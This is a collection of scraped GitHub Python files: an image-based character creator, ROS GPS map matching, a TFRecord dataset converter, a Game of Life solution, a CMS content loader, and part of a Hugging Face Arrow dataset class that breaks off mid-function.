self.curr_shirt -= 1\n if (self.curr_shirt <= -1):\n self.curr_shirt = len(self.shirts) - 1\n 
self.character = self.base.copy()\n self.setAllColor()\n\n def _shirtRight(self):\n self.curr_shirt += 1\n if (self.curr_shirt >= len(self.shirts)):\n self.curr_shirt = 0\n self.character = self.base.copy()\n self.setAllColor()\n\n def _pantsLeft(self):\n self.curr_pants -= 1\n if (self.curr_pants <= -1):\n self.curr_pants = len(self.pants) - 1\n self.character = self.base.copy()\n self.setAllColor()\n\n def _pantsRight(self):\n self.curr_pants += 1\n if (self.curr_pants >= len(self.pants)):\n self.curr_pants = 0\n self.character = self.base.copy()\n self.setAllColor()\n\n def _shoesLeft(self):\n self.curr_shoes -= 1\n if (self.curr_shoes <= -1):\n self.curr_shoes = len(self.shoes) - 1\n self.character = self.base.copy()\n self.setAllColor()\n\n def _shoesRight(self):\n self.curr_shoes += 1\n if (self.curr_shoes >= len(self.shoes)):\n self.curr_shoes = 0\n self.character = self.base.copy()\n self.setAllColor()\n\n def returnGIF(self):\n return ImageTk.PhotoImage(self.character)\n","repo_name":"GRNCheetah/database-character-creator","sub_path":"ImageEdit.py","file_name":"ImageEdit.py","file_ext":"py","file_size_in_byte":10104,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3239535606","text":"import rospy\nfrom collections import OrderedDict\n\nimport time\nfrom std_msgs.msg import Float64\n\nclass map_match:\n\tdef __init__(self, path):\n\t\tself.path = path\n\t\tself.nodes_gdf = self.path.get_path_nodes()\n\t\tself.edges_gdf = self.path.get_path_edges()\n\t\t\n\t\t# self.time_pub = rospy.Publisher('time_computation', Float64, queue_size=1)\n\n\t\tself.init_search_radius = rospy.get_param(\"/road_estimation/search_radius\")\n\n\t\t# self.file = open(\"/home/mustafaismail/Documents/GP/catkin_ws/src/gps_road_estimation/src/time.txt\", \"w\") \n\n\tdef get_projected_p(self, odom_point):\n\t\tself.search_radius = self.init_search_radius\n\t\t\n\t\tdistance = []\n\t\tfor edge in self.get_candidate_edges(odom_point):\n\t\t\tline_string = self.edges_gdf[(self.edges_gdf.u == edge[0]) & (self.edges_gdf.v == edge[1])].geometry\n\t\t\tdistance.append([line_string.distance(odom_point), edge, line_string])\n\n\t\ttup = min(distance, key = lambda t: t[0].values)\n\t\ttrue_edge = tup[1]\n\t\ttrue_edge_geom = tup[2].item()\n\n\t\tprojected_point = true_edge_geom.interpolate(true_edge_geom.project(odom_point)) # projected point\n\n\t\treturn projected_point, true_edge[0]\n\n\tdef get_candidate_edges(self, odom_point):\n\t\twhile True:\n\t\t\tcircle = odom_point.buffer(self.search_radius) \n\t\t\tpossible_matches_index = list(self.edges_gdf.sindex.intersection((circle.bounds))) \n\t\t\tpossible_matches = self.edges_gdf.iloc[possible_matches_index] \n\t\t\tprecise_matches = possible_matches[possible_matches.intersects(circle)]\n\t\t\tcandidate_ed = list(precise_matches.index)\n\n\t\t\tif len(candidate_ed) != 0:\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tself.search_radius += self.init_search_radius\n\n\t\tcandidate_edges = []\n\t\tfor edge_id in candidate_ed:\n\t\t\tpoint_tuple = (edge_id, edge_id+1)\n\t\t\tcandidate_edges.append(point_tuple)\n\t\t\t# first node\n\t\t\t# if node_id == 0:\n\t\t\t# \tpoint_tuple_out = (node_id, node_id+1)\n\t\t\t# \tcandidate_edges.append(point_tuple_out)\n\t\t\t# # last node\n\t\t\t# elif node_id == len(self.nodes_gdf)-1:\n\t\t\t# point_tuple_in = (node_id-1, node_id)\n\t\t\t# candidate_edges.append(point_tuple_in)\n\t\t\t# # any other node\n\t\t\t# else:\n\t\t\t# point_tuple_in = (node_id-1, node_id)\n\t\t\t# 
point_tuple_out = (node_id, node_id+1)\n\t\t\t# candidate_edges.append(point_tuple_in)\n\t\t\t# candidate_edges.append(point_tuple_out)\n\n\t\tcandidate_edges = list(OrderedDict.fromkeys(candidate_edges))\n\n\t\treturn candidate_edges\n\n\t\t# candidate_edges = []\n\t\t# for node_id in self.get_candidate_nodes(odom_point):\n\t\t# \t# first node\n\t\t# \tif node_id == 0:\n\t\t# \t\tpoint_tuple_out = (node_id, node_id+1)\n\t\t# \t\tcandidate_edges.append(point_tuple_out)\n\t\t# \t# last node\n\t\t# \telif node_id == len(self.nodes_gdf)-1:\n\t\t# \t point_tuple_in = (node_id-1, node_id)\n\t\t# \t candidate_edges.append(point_tuple_in)\n\t\t# \t# any other node\n\t\t# \telse:\n\t\t# \t point_tuple_in = (node_id-1, node_id)\n\t\t# \t point_tuple_out = (node_id, node_id+1)\n\t\t# \t candidate_edges.append(point_tuple_in)\n\t\t# \t candidate_edges.append(point_tuple_out)\n\n\t\t# candidate_edges = list(OrderedDict.fromkeys(candidate_edges))\n\n\t# def get_candidate_nodes(self, odom_point):\n\t# \twhile True:\n\t# \t\tcircle = odom_point.buffer(self.search_radius) \n\t# \t\tpossible_matches_index = list(self.nodes_spatial_index.intersection((circle.bounds))) \n\t# \t\tpossible_matches = self.nodes_gdf.iloc[possible_matches_index] \n\t# \t\tprecise_matches = possible_matches[possible_matches.intersects(circle)]\n\t# \t\tcandidate_nodes = list(precise_matches.index)\n\n\t# \t\tif len(candidate_nodes) != 0:\n\t# \t\t\tbreak\n\t# \t\telse:\n\t# \t\t\t# rospy.loginfo(self.search_radius)\n\t# \t\t\tself.search_radius += 5\n\n\t# \treturn candidate_nodes\n","repo_name":"BLue1881euLB/gps2road","sub_path":"gps_road_estimation-master/src/map_match.py","file_name":"map_match.py","file_ext":"py","file_size_in_byte":3552,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"33386112839","text":"r\"\"\"Converts document image data to TFRecords of TF-Example protos.\n\nThis module reads the document images and their labels and creates two\nTFRecord datasets: one for train\nand one for validation. 
Each TFRecord dataset is comprised of a set of TF-Example\nprotocol buffers, each of which contains a single image and label.\n\nThe script should take about a minute to run.\n\n\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport math\nimport os\nimport random\nimport sys\nimport csv\nimport tensorflow as tf\nimport cv2\nfrom datasets import dataset_utils\n\n# The number of images in the validation set.\n_NUM_VALIDATION = 40000\n\n# Seed for repeatability.\n_RANDOM_SEED = 0\n\n# The number of shards per dataset split.\n_NUM_SHARDS = 5\n\n\nclass ImageReader(object):\n \"\"\"Helper class that provides TensorFlow image coding utilities.\"\"\"\n\n def __init__(self):\n # Initializes function that decodes RGB PNG data.\n self._decode_png_data = tf.placeholder(dtype=tf.string)\n self._decode_png = tf.image.decode_png(self._decode_png_data, channels=3)\n\n def read_image_dims(self, sess, image_data):\n image = self.decode_png(sess, image_data)\n return image.shape[0], image.shape[1]\n\n def decode_png(self, sess, image_data):\n image = sess.run(self._decode_png,\n feed_dict={self._decode_png_data: image_data})\n assert len(image.shape) == 3\n assert image.shape[2] == 3\n return image\n\n\ndef _get_filenames_and_classes(dataset_dir, split_name):\n \"\"\"Reads a split file and returns image paths and integer labels.\n\n Args:\n dataset_dir: The dataset root. It must contain an 'images' directory and\n a 'labels' directory with one '<split_name>.txt' file per split.\n split_name: The split to read, e.g. 'train' or 'val'.\n\n Returns:\n A list of absolute image file paths (re-encoded as PNG) and the list of\n their integer labels.\n \"\"\"\n annotations_root = os.path.join(dataset_dir, 'labels')\n images_root = os.path.join(dataset_dir, 'images')\n split_file = os.path.join(annotations_root, split_name)\n file_names = []\n labels = []\n with open(split_file + '.txt') as csvFile:\n read_object = csv.reader(csvFile, delimiter=' ')\n for row in read_object:\n print(row[0])\n abs_file = os.path.join(images_root, row[0])\n # file_names.append(abs_file)\n image = cv2.imread(abs_file)\n new_name = row[0].split('.')[0]\n final_image_name = os.path.join(images_root, new_name + '.png')\n print(final_image_name)\n print(cv2.imwrite(final_image_name, image))\n file_names.append(final_image_name)\n labels.append(int(row[1]))\n return file_names, labels\n\ndef _get_dataset_filename(dataset_dir, split_name, shard_id):\n output_filename = 'documents_%s_%05d-of-%05d.tfrecord' % (\n split_name, shard_id, _NUM_SHARDS)\n return os.path.join(dataset_dir, output_filename)\n\ndef _convert_dataset(split_name, image_names, image_labels, dataset_dir):\n \"\"\"Converts the given filenames to a TFRecord dataset.\n\n Args:\n split_name: The name of the dataset split, either 'train' or 'val'.\n image_names: A list of absolute paths to PNG images.\n image_labels: A list of integer class ids, aligned with image_names.\n dataset_dir: The directory where the converted datasets are stored.\n \"\"\"\n filenames = image_names\n assert split_name in ['train', 'val']\n\n num_per_shard = int(math.ceil(len(filenames) / float(_NUM_SHARDS)))\n\n with tf.Graph().as_default():\n image_reader = ImageReader()\n\n with tf.Session('') as sess:\n\n for shard_id in range(_NUM_SHARDS):\n output_filename = _get_dataset_filename(\n dataset_dir, split_name, shard_id)\n\n with tf.python_io.TFRecordWriter(output_filename) as tfrecord_writer:\n start_ndx = shard_id * num_per_shard\n 
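# Each shard covers a contiguous slice of the file list; the last\n # shard may be shorter, hence the min() bound on end_ndx below.\n 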
end_ndx = min((shard_id+1) * num_per_shard, len(filenames))\n for i in range(start_ndx, end_ndx):\n sys.stdout.write('\\r>> Converting image %d/%d shard %d' % (\n i+1, len(filenames), shard_id))\n sys.stdout.flush()\n\n # Read the filename:\n print (filenames[i])\n image_data = tf.gfile.FastGFile(filenames[i], 'rb').read()\n height, width = image_reader.read_image_dims(sess, image_data)\n\n class_id = int(image_labels[i])\n\n example = dataset_utils.image_to_tfexample(\n image_data, b'png', height, width, class_id)\n tfrecord_writer.write(example.SerializeToString())\n\n sys.stdout.write('\\n')\n sys.stdout.flush()\n\ndef _get_labels_map(dataset_dir):\n \"\"\"Reads the label map file and returns class names and their ids.\n\n Args:\n dataset_dir: The dataset root; the mapping is read from\n 'labels/label_map.txt', one 'id name' pair per line.\n\n Returns:\n A list of class names and the list of their integer ids.\n \"\"\"\n dataset_root = dataset_dir\n labels_map_file = os.path.join(dataset_root,'labels', 'label_map.txt')\n label_id = []\n label_name = []\n\n with open(labels_map_file) as csvFile:\n read_object = csv.reader(csvFile, delimiter=' ')\n for row in read_object:\n label_id.append(int(row[0]))\n label_name.append(row[1])\n return label_name, label_id\n\n\ndef run(dataset_dir):\n \"\"\"Runs the conversion operation.\n\n Args:\n dataset_dir: The dataset directory where the dataset is stored.\n \"\"\"\n tf_record_directory = dataset_dir\n if not tf.gfile.Exists(tf_record_directory):\n tf.gfile.MakeDirs(tf_record_directory)\n\n # dataset_utils.download_and_uncompress_tarball(_DATA_URL, dataset_dir)\n image_names, image_labels = _get_filenames_and_classes(dataset_dir, split_name='train')\n class_names, class_id = _get_labels_map(dataset_dir)\n print(class_names)\n class_names_to_ids = dict(zip(class_names, class_id))\n _convert_dataset(split_name = 'train', dataset_dir = tf_record_directory, image_names = image_names, image_labels = image_labels)\n\n image_names, image_labels = _get_filenames_and_classes(dataset_dir, split_name='val')\n class_names, class_id = _get_labels_map(dataset_dir)\n print(class_names)\n #class_names_to_ids = dict(zip(class_names, class_id))\n _convert_dataset(split_name = 'val', dataset_dir = tf_record_directory, image_names = image_names, image_labels = image_labels)\n\n # Finally, write the labels file:\n labels_to_class_names = dict((v, k) for k, v in class_names_to_ids.items())\n dataset_utils.write_label_file(labels_to_class_names, dataset_dir)\n print('\\nFinished converting the documents dataset!')\n","repo_name":"sunsided/cb","sub_path":"datasets/convert_document_images.py","file_name":"convert_document_images.py","file_ext":"py","file_size_in_byte":6739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41957060781","text":"from typing import List\n\nclass Solution:\n '''\n LeetCode Monthly Challenge problem for December 30th, 2020.\n '''\n def gameOfLife(self, board: List[List[int]]) -> None:\n '''\n Background reading: John Horton Conway's Game of Life.\n \n Given an M x N grid of cells, modifies the board in-place to the next\n state. A live cell is represented by 1, and a dead cell is represented\n by a 0. 
A cell's next state is determined by the following rules:\n \n Any live cell with fewer than two live neighbors dies\n Any live cell with two or three live neighbors lives\n Any live cell with more than three live neighbors dies\n Any dead cell with exactly three live neighbors becomes a live cell\n \n Constraints:\n m == len(board)\n n == len(board[i])\n 1 <= m, n <= 25\n board[i][j] is 0 or 1\n \n Params:\n board - A list of binary lists.\n \n Returns:\n None - Board is modified in-place to the next state.\n \n Examples:\n Below are examples of boards and their next state:\n \n [[0,1,0], [[0,0,0],\n [0,0,1], -> [1,0,1],\n [1,1,1], [0,1,1],\n [0,0,0]] [0,1,0]]\n \n \n [[1,1], [[1,1],\n [1,0]] -> [1,1]]\n '''\n if not len(board) or not len(board[0]):\n return\n \n for row in board:\n if len(row) != len(board[0]):\n return\n \n m = len(board)\n n = len(board[0])\n \n # Visit each cell of board\n for row in range(m):\n for col in range(n):\n \n # Pair the current cell with its right neighbor and the three\n # cells below it; each pair adds 2x the other's original state\n # (kept in the low bit), so every neighbor relation is counted\n # exactly once across the scan.\n for y, x in [(0,1),(1,-1),(1,0),(1,1)]:\n if 0 <= col + x < n and row + y < m:\n board[row][col] += 2 * (board[row+y][col+x] % 2)\n board[row+y][col+x] += 2 * (board[row][col] % 2)\n \n # The cell now holds original_state + 2 * live_neighbors:\n # 5 and 7 are live cells with two or three live neighbors,\n # and 6 is a dead cell with exactly three; only these live on.\n if 5 <= board[row][col] <= 7:\n board[row][col] = 1\n else:\n board[row][col] = 0\n","repo_name":"Hilldrupca/LeetCode","sub_path":"python/Monthly/Dec2020/gameoflife.py","file_name":"gameoflife.py","file_ext":"py","file_size_in_byte":2408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4277146706","text":"# coding: utf-8\n'''\nContent discovery and provision.\n'''\n\nimport os\nimport yaml\nimport json\nimport canvas as cv\nimport canvas.ext as cve\n\nfrom json import JSONDecodeError as JSONParserError\nfrom yaml.parser import ParserError as YAMLParserError\n\nfrom .exceptions import NoSuchContent, ContentSyntaxError\n\nlog = cv.logger(__name__)\n\n# A tuple rather than a subclass: an except clause only matches the named\n# class and its subclasses, so it must list the concrete parser errors.\nParserError = (JSONParserError, YAMLParserError)\n\nclass Content:\n\tinstances = dict()\n\n\tdef __init__(self, typ, content, page_description):\n\t\tself.type, self.content = typ, content\n\t\tself.page_description = page_description\n\n\t@classmethod\n\tdef create(cls, name, content_data):\n\t\tdef attributize(item):\n\t\t\tif isinstance(item, dict):\n\t\t\t\tfor key, value in item.items():\n\t\t\t\t\titem[key] = attributize(value)\n\t\t\t\titem = cve.AttributedDict(item)\n\t\t\telif isinstance(item, (list, tuple)):\n\t\t\t\tfor i, value in enumerate(item):\n\t\t\t\t\titem[i] = attributize(value)\n\t\t\treturn item\n\n\t\tinstance = Content(\n\t\t\tcontent_data.get('type'), \n\t\t\tattributize(content_data['content']),\n\t\t\tcontent_data.get('page_description')\n\t\t)\n\t\tcls.instances[name] = instance\n\t\treturn instance\n\n\t@classmethod\n\tdef get(cls, name):\n\t\tif cv.config.development.debug:\n\t\t\toccur = cv.get_path('content', '%s.yaml'%name)\n\t\t\tparser = yaml.safe_load\n\t\t\tif not occur:\n\t\t\t\toccur = cv.get_path('content', '%s.json'%name)\n\t\t\t\tparser = json.load\n\t\t\t\tif not occur:\n\t\t\t\t\traise NoSuchContent(name)\n\n\t\t\twith open(occur) as content_file:\n\t\t\t\treturn Content.create(name, parser(content_file))\n\n\t\tif name not in cls.instances:\n\t\t\traise NoSuchContent(name)\n\n\t\treturn cls.instances[name]\n\n\t@classmethod\n\tdef items(cls):\n\t\treturn cls.instances.items()\n\ndef get_content(content_key):\n\treturn Content.get(content_key).content\n\n@cv.on_init\ndef load_contents():\n\tlog.info('Finding static 
content...')\n\tfor content_dir in cve.get_path_occurrences('content', is_dir=True):\n\t\tfor filename in os.listdir(content_dir):\n\t\t\tcontent_name, ext = filename.rsplit('.', 1)\n\t\t\tif ext == 'yaml':\n\t\t\t\tparser = yaml.safe_load\n\t\t\telif ext == 'json':\n\t\t\t\tparser = json.load\n\t\t\telse:\n\t\t\t\tcontinue\n\n\t\t\twith open(os.path.join(content_dir, filename)) as content_file:\n\t\t\t\ttry:\n\t\t\t\t\tloaded_content = parser(content_file)\n\t\t\t\texcept ParserError as ex:\n\t\t\t\t\traise ContentSyntaxError(str(ex)) from None\n\t\t\t\tContent.create(content_name, loaded_content)\n\n\tlog.info('\\n'.join((\n\t\t'Loaded content:', *(item[0] for item in Content.items())\n\t)))\n","repo_name":"robinsax/canvas-plugin-multirepo","sub_path":"cvpl-cms/cms/content.py","file_name":"content.py","file_ext":"py","file_size_in_byte":2374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2341005760","text":"import contextlib\nimport json\nimport os\nimport pickle\nimport shutil\nimport tempfile\nfrom collections import defaultdict\nfrom collections.abc import Iterable, Mapping\nfrom dataclasses import asdict\nfrom functools import partial, wraps\nfrom math import ceil, floor\nfrom multiprocessing import Pool, RLock\nfrom typing import TYPE_CHECKING, Any, Callable, Dict, List, Optional, Tuple, Union\n\nimport numpy as np\nimport pandas as pd\nimport pyarrow as pa\nfrom tqdm.auto import tqdm\n\nfrom .arrow_reader import ArrowReader\nfrom .arrow_writer import ArrowWriter, TypedSequence\nfrom .features import Features, Value, cast_to_python_objects, pandas_types_mapper\nfrom .fingerprint import fingerprint, generate_fingerprint, update_fingerprint\nfrom .info import DatasetInfo\nfrom .search import IndexableMixin\nfrom .splits import NamedSplit\nfrom .utils import map_nested\nfrom .utils.logging import WARNING, get_logger, get_verbosity, set_verbosity_warning\n\n\nif TYPE_CHECKING:\n from .dataset_dict import DatasetDict\n\nlogger = get_logger(__name__)\n\nif int(pa.__version__.split(\".\")[0]) == 0:\n PYARROW_V0 = True\nelse:\n PYARROW_V0 = False\n\n\nclass DatasetInfoMixin(object):\n \"\"\"This base class exposes some attributes of DatasetInfo\n at the base level of the Dataset for easy access.\n \"\"\"\n\n def __init__(self, info: DatasetInfo, split: Optional[NamedSplit]):\n self._info = info\n self._split = split\n\n @property\n def info(self):\n \"\"\" :class:`datasets.DatasetInfo` object containing all the metadata in the dataset.\"\"\"\n return self._info\n\n @property\n def split(self):\n \"\"\" :class:`datasets.NamedSplit` object corresponding to the dataset split.\"\"\"\n return self._split\n\n @property\n def builder_name(self) -> str:\n return self._info.builder_name\n\n @property\n def citation(self) -> str:\n return self._info.citation\n\n @property\n def config_name(self) -> str:\n return self._info.config_name\n\n @property\n def dataset_size(self) -> Optional[int]:\n return self._info.dataset_size\n\n @property\n def description(self) -> str:\n return self._info.description\n\n @property\n def download_checksums(self) -> Optional[dict]:\n return self._info.download_checksums\n\n @property\n def download_size(self) -> Optional[int]:\n return self._info.download_size\n\n @property\n def features(self) -> Features:\n return self._info.features\n\n @property\n def homepage(self) -> Optional[str]:\n return self._info.homepage\n\n @property\n def license(self) -> Optional[str]:\n return self._info.license\n\n 
@property\n def size_in_bytes(self) -> Optional[int]:\n return self._info.size_in_bytes\n\n @property\n def supervised_keys(self):\n return self._info.supervised_keys\n\n @property\n def version(self):\n return self._info.version\n\n\nclass DatasetTransformationNotAllowedError(Exception):\n pass\n\n\ndef transmit_format(func):\n \"\"\"Wrapper for dataset transforms that are not in-place to transmit the format of the original dataset to the new dataset\"\"\"\n\n @wraps(func)\n def wrapper(*args, **kwargs):\n if args:\n self: \"Dataset\" = args[0]\n args = args[1:]\n else:\n self: \"Dataset\" = kwargs.pop(\"self\")\n # don't use self.format since it returns a list of columns for 'columns' even if self_format_columns is None\n new_format = {\n \"type\": self._format_type,\n \"format_kwargs\": self._format_kwargs,\n \"columns\": self._format_columns,\n \"output_all_columns\": self._output_all_columns,\n }\n out: Union[\"Dataset\", \"DatasetDict\"] = func(self, *args, **kwargs)\n if new_format[\"columns\"] is not None:\n new_format[\"columns\"] = list(set(new_format[\"columns\"]) & set(out.column_names))\n datasets: List[\"Dataset\"] = list(out.values()) if isinstance(out, dict) else [out]\n for dataset in datasets:\n out_format = {\n \"type\": dataset._format_type,\n \"format_kwargs\": dataset._format_kwargs,\n \"columns\": dataset._format_columns,\n \"output_all_columns\": dataset._output_all_columns,\n }\n if out_format != new_format:\n dataset.set_format(**new_format)\n return out\n\n wrapper._decorator_name_ = \"transmit_format\"\n return wrapper\n\n\nclass Dataset(DatasetInfoMixin, IndexableMixin):\n \"\"\"A Dataset backed by an Arrow table or Record Batch.\"\"\"\n\n def __init__(\n self,\n arrow_table: pa.Table,\n data_files: Optional[List[dict]] = None,\n info: Optional[DatasetInfo] = None,\n split: Optional[NamedSplit] = None,\n indices_table: Optional[pa.Table] = None,\n indices_data_files: Optional[List[dict]] = None,\n fingerprint: Optional[str] = None,\n inplace_history: Optional[List[dict]] = None,\n ):\n info = info.copy() if info is not None else DatasetInfo()\n DatasetInfoMixin.__init__(self, info=info, split=split)\n IndexableMixin.__init__(self)\n self._data: pa.Table = arrow_table\n self._indices: Optional[pa.Table] = indices_table\n self._data_files: List[dict] = data_files if data_files is not None else []\n self._indices_data_files: List[dict] = indices_data_files if indices_data_files is not None else []\n self._inplace_history: List[dict] = (\n inplace_history\n if inplace_history is not None\n else [{\"transforms\": []} for _ in range(len(self._data_files))]\n )\n self._format_type: Optional[str] = None\n self._format_kwargs: dict = {}\n self._format_columns: Optional[list] = None\n self._output_all_columns: bool = False\n self._fingerprint: str = fingerprint\n\n # Read metadata\n\n if self._data.schema.metadata is not None and \"huggingface\".encode(\"utf-8\") in self._data.schema.metadata:\n metadata = json.loads(self._data.schema.metadata[\"huggingface\".encode(\"utf-8\")].decode())\n if \"info\" in metadata and self.info.features is None: # try to load features from the arrow file metadata\n self._info.features = DatasetInfo.from_dict(metadata[\"info\"]).features\n if (\n \"fingerprint\" in metadata and self._fingerprint is None\n ): # try to load fingerprint from the arrow file metadata\n self._fingerprint = metadata[\"fingerprint\"]\n\n # Infer features if None\n\n inferred_features = Features.from_arrow_schema(arrow_table.schema)\n if self.info.features is 
None:\n self.info.features = inferred_features\n\n # Infer fingerprint if None\n\n if self._fingerprint is None:\n self._fingerprint = generate_fingerprint(self)\n\n # Sanity checks\n\n assert self.features is not None, \"Features can't be None in a Dataset object\"\n assert self._fingerprint is not None, \"Fingerprint can't be None in a Dataset object\"\n if self.info.features.type != inferred_features.type:\n raise ValueError(\n \"External features info don't match the dataset:\\nGot\\n{}\\nwith type\\n{}\\n\\nbut expected something like\\n{}\\nwith type\\n{}\".format(\n self.info.features, self.info.features.type, inferred_features, inferred_features.type\n )\n )\n\n if self._indices is not None:\n assert pa.types.is_unsigned_integer(\n self._indices.column(0)[0].type\n ), f\"indices must be an Arrow table of unsigned integers, current type is {self._indices.column(0)[0].type}\"\n\n @classmethod\n def from_file(\n cls,\n filename: str,\n info: Optional[DatasetInfo] = None,\n split: Optional[NamedSplit] = None,\n indices_filename: Optional[str] = None,\n ) -> \"Dataset\":\n \"\"\" Instantiate a Dataset backed by an Arrow table at filename \"\"\"\n mmap = pa.memory_map(filename)\n f = pa.ipc.open_stream(mmap)\n pa_table = f.read_all()\n data_files = [{\"filename\": filename}]\n\n if indices_filename is not None:\n indices_mmap = pa.memory_map(indices_filename)\n indices_f = pa.ipc.open_stream(indices_mmap)\n indices_pa_table = indices_f.read_all()\n indices_data_files = [{\"filename\": indices_filename}]\n else:\n indices_pa_table = None\n indices_data_files = None\n\n return cls(\n arrow_table=pa_table,\n data_files=data_files,\n info=info,\n split=split,\n indices_table=indices_pa_table,\n indices_data_files=indices_data_files,\n )\n\n @classmethod\n def from_buffer(\n cls,\n buffer: pa.Buffer,\n info: Optional[DatasetInfo] = None,\n split: Optional[NamedSplit] = None,\n indices_buffer: Optional[pa.Buffer] = None,\n ) -> \"Dataset\":\n \"\"\" Instantiate a Dataset backed by an Arrow buffer \"\"\"\n mmap = pa.BufferReader(buffer)\n f = pa.ipc.open_stream(mmap)\n pa_table = f.read_all()\n\n if indices_buffer is not None:\n indices_mmap = pa.BufferReader(indices_buffer)\n indices_f = pa.ipc.open_stream(indices_mmap)\n indices_pa_table = indices_f.read_all()\n else:\n indices_pa_table = None\n\n return cls(pa_table, info=info, split=split, indices_table=indices_pa_table)\n\n @classmethod\n def from_pandas(\n cls,\n df: pd.DataFrame,\n features: Optional[Features] = None,\n info: Optional[DatasetInfo] = None,\n split: Optional[NamedSplit] = None,\n ) -> \"Dataset\":\n \"\"\"\n Convert :obj:``pandas.DataFrame`` to a :obj:``pyarrow.Table`` to create a :obj:``datasets.Dataset``.\n\n The column types in the resulting Arrow Table are inferred from the dtypes of the pandas.Series in the DataFrame. In the case of non-object\n Series, the NumPy dtype is translated to its Arrow equivalent. In the case of `object`, we need to guess the datatype by looking at the\n Python objects in this Series.\n\n Be aware that Series of the `object` dtype don't carry enough information to always lead to a meaningful Arrow type. In the case that\n we cannot infer a type, e.g. because the DataFrame is of length 0 or the Series only contains None/nan objects, the type is set to\n null. 
This behavior can be avoided by constructing explicit features and passing them to this function.\n\n Args:\n df (:obj:``pandas.DataFrame``): the dataframe that contains the dataset.\n features (:obj:``datasets.Features``, `optional`, defaults to :obj:``None``): If specified, the features types of the dataset\n info (:obj:``datasets.DatasetInfo``, `optional`, defaults to :obj:``None``): If specified, the dataset info containing info like\n description, citation, etc.\n split (:obj:``datasets.NamedSplit``, `optional`, defaults to :obj:``None``): If specified, the name of the dataset split.\n \"\"\"\n if info is not None and features is not None and info.features != features:\n raise ValueError(\n \"Features specified in `features` and `info.features` can't be different:\\n{}\\n{}\".format(\n features, info.features\n )\n )\n features = features if features is not None else info.features if info is not None else None\n if info is None:\n info = DatasetInfo()\n info.features = features\n pa_table: pa.Table = pa.Table.from_pandas(\n df=df, schema=pa.schema(features.type) if features is not None else None\n )\n return cls(pa_table, info=info, split=split)\n\n @classmethod\n def from_dict(\n cls,\n mapping: dict,\n features: Optional[Features] = None,\n info: Optional[Any] = None,\n split: Optional[Any] = None,\n ) -> \"Dataset\":\n \"\"\"\n Convert :obj:``dict`` to a :obj:``pyarrow.Table`` to create a :obj:``datasets.Dataset``.\n\n Args:\n mapping (:obj:``mapping``): A mapping of strings to Arrays or Python lists.\n features (:obj:``datasets.Features``, `optional`, defaults to :obj:``None``): If specified, the features types of the dataset\n info (:obj:``datasets.DatasetInfo``, `optional`, defaults to :obj:``None``): If specified, the dataset info containing info like\n description, citation, etc.\n split (:obj:``datasets.NamedSplit``, `optional`, defaults to :obj:``None``): If specified, the name of the dataset split.\n \"\"\"\n if info is not None and features is not None and info.features != features:\n raise ValueError(\n \"Features specified in `features` and `info.features` can't be different:\\n{}\\n{}\".format(\n features, info.features\n )\n )\n features = features if features is not None else info.features if info is not None else None\n if info is None:\n info = DatasetInfo()\n info.features = features\n if features is not None:\n mapping = features.encode_batch(mapping)\n else:\n mapping = cast_to_python_objects(mapping)\n mapping = {\n col: TypedSequence(data, type=features.type[col].type if features is not None else None)\n for col, data in mapping.items()\n }\n pa_table: pa.Table = pa.Table.from_pydict(mapping=mapping)\n return cls(pa_table, info=info, split=split)\n\n def __getstate__(self):\n state = dict(self.__dict__)\n state[\"_info\"] = json.dumps(asdict(state[\"_info\"]))\n state[\"_split\"] = str(state[\"_split\"]) if state[\"_split\"] is not None else None\n if self._data_files:\n state[\"_data\"] = None\n if self._indices_data_files:\n state[\"_indices\"] = None\n return state\n\n def __setstate__(self, state):\n assert (\n state.get(\"_data\") is not None or state.get(\"_data_files\") is not None\n ), \"tried to unpickle a dataset without arrow_table or data_files\"\n state = dict(state)\n state[\"_info\"] = DatasetInfo.from_dict(json.loads(state[\"_info\"]))\n state[\"_split\"] = NamedSplit(state[\"_split\"]) if state[\"_split\"] is not None else None\n self.__dict__ = state\n reader = ArrowReader(\"\", self.info)\n # Read arrow tables\n if self._data is None and 
self._data_files:\n tables = []\n for data_file, inplace_hist_per_file in zip(self._data_files, self._inplace_history):\n # Replay in-place history of transforms (cast_, rename_column_, etc.)\n pa_table = reader._read_files([data_file])\n sub_dataset = Dataset(pa_table, fingerprint=\"\")\n for inplace_transform_name, args, kwargs in inplace_hist_per_file[\"transforms\"]:\n getattr(sub_dataset, inplace_transform_name)(*args, **kwargs)\n tables.append(sub_dataset._data)\n tables = [t for t in tables if len(t) > 0]\n # fix all-empty tables\n tables = tables or [pa.Table.from_batches([], schema=pa.schema(self.info.features.type))]\n self._data = pa.concat_tables(tables)\n reader = ArrowReader(\"\", DatasetInfo(features=Features({\"indices\": Value(\"int64\")})))\n if self._indices is None and self._indices_data_files:\n self._indices = reader._read_files(self._indices_data_files)\n\n def save_to_disk(self, dataset_path: str):\n \"\"\"\n Save the dataset in a dataset directory\n\n Args:\n dataset_path (``str``): path of the dataset directory where the dataset will be saved to\n \"\"\"\n assert (\n not self.list_indexes()\n ), \"please remove all the indexes using `dataset.drop_index` before saving a dataset\"\n self = pickle.loads(pickle.dumps(self))\n os.makedirs(dataset_path, exist_ok=True)\n # Write indices if needed\n if self._indices is not None:\n if not self._indices_data_files:\n cache_file_name = os.path.join(dataset_path, \"indices.arrow\")\n writer = ArrowWriter(path=cache_file_name)\n writer.write_table(self._indices)\n writer.finalize()\n self._indices_data_files = [{\"filename\": cache_file_name}]\n # Write dataset if needed\n if not self._data_files or any(len(h[\"transforms\"]) > 0 for h in self._inplace_history):\n cache_file_name = os.path.join(dataset_path, \"dataset.arrow\")\n writer = ArrowWriter(path=cache_file_name)\n writer.write_table(self._data)\n writer.finalize()\n self._data_files = [{\"filename\": cache_file_name}]\n self._inplace_history = [{\"transforms\": []}]\n # Copy all files into the dataset directory\n for data_file in self._data_files + self._indices_data_files:\n # Copy file to destination directory\n src = data_file[\"filename\"]\n filename = src.split(\"/\")[-1]\n dest = os.path.join(dataset_path, filename)\n if src != dest:\n shutil.copy(src, 